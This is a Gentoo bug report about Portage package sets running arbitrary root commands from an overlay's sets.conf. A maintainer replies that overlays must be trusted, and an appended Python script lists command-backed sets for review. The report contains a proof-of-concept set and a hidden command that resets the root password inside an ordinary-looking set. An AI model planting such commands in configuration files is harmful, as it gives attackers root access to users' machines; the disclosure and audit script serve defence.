Bug 262746 - Portage sets allows any overlay master gain full access on user machine.
Status: RESOLVED WONTFIX
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High blocker
Assignee: Gentoo Security
Reported: 2009-03-16 23:31 UTC by Petr Polezhaev
Modified: 2009-03-16 23:45 UTC
Description Petr Polezhaev 2009-03-16 23:31:02 UTC
-----------------------------------------------------------------------------
Nord night # cat /usr/local/portage/sets.conf 
[suicide]
class = portage.sets.shell.CommandOutputSet
command = echo -e "$(eix -I --only-names)\n$(emerge --list-sets | grep -v '^(*.glsa.*|downgrade|unavailible|module-rebuild)$'| sed 's/^\s*/@/')"

[test]
class = portage.sets.shell.CommandOutputSet
command = echo $(whoami > /var/lib/portage/test)
Nord night # emerge @test
emerge: 'test' is an empty set
emerge: no targets left after set expansion
Nord night # cat /var/lib/portage/test 
nightr
-------------------------------------------------------------------------
(nightr - aliased root user with uid 0).

This is a simple example, but such a string may be hidden in any real set, just like this:
'command = echo -e "$(echo -e "abc123\nabc123" | passwd root)\n$(<real command>)"

Reproducible: Always

Steps to Reproduce:
1. Make a set like the one above.
2. emerge @<set_name>
3. Don't forget to turn on sshd and tell what password you've assigned in the set =)
Comment 1 Robert Buchholz (RETIRED) gentoo-dev 2009-03-16 23:45:23 UTC
Any ebuild within the overlay can execute code with root privileges outside the sandbox anyway. What's the point of protecting against attacks via malicious sets?

You must trust the owner of a repository when adding it to your list of overlays.
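
For reviewing an overlay before trusting it, the following added example (not part of the bug thread and not Portage code) lists every set in a sets.conf whose class is a CommandOutputSet, together with the `$(...)` substitutions nested in its command. The function names are hypothetical, the sample is constructed from the report's [test] set, and the code assumes sets.conf sits at the overlay root, as in the report.

```python
import configparser
from pathlib import Path

# Constructed sample: the [test] set from the report plus a file-based set.
SAMPLE = """\
[test]
class = portage.sets.shell.CommandOutputSet
command = echo $(whoami > /var/lib/portage/test)

[harmless]
class = portage.sets.files.StaticFileSet
"""

def substitutions(command):
    """Top-level $(...) spans, found by counting parentheses (quoting is not parsed)."""
    found, depth, start = [], 0, 0
    for i, ch in enumerate(command):
        if ch == "(" and (depth or command[i - 1:i] == "$"):
            if depth == 0:
                start = i - 1
            depth += 1
        elif ch == ")" and depth:
            depth -= 1
            if depth == 0:
                found.append(command[start:i + 1])
    return found

def find_command_sets(text, source="<string>"):
    """Return the sets in one sets.conf whose class runs a shell command."""
    # interpolation=None: commands may contain '%' and must be read verbatim.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text, source=source)
    hits = []
    for name in cp.sections():
        if cp.get(name, "class", fallback="").endswith("CommandOutputSet"):
            cmd = cp.get(name, "command", fallback="")
            hits.append({"file": source, "set": name, "command": cmd,
                         "substitutions": substitutions(cmd)})
    return hits

def audit_overlay(root):
    """Audit <root>/sets.conf; an overlay without one yields no findings."""
    conf = Path(root) / "sets.conf"
    return find_command_sets(conf.read_text(), str(conf)) if conf.is_file() else []

if __name__ == "__main__":
    for hit in find_command_sets(SAMPLE):
        print(f"{hit['file']}: @{hit['set']} runs: {hit['command']}")
        for sub in hit["substitutions"]:
            print(f"    nested command: {sub}")
```

This only surfaces shell-backed sets for manual review; as Comment 1 points out, ebuilds in the same overlay need the same scrutiny.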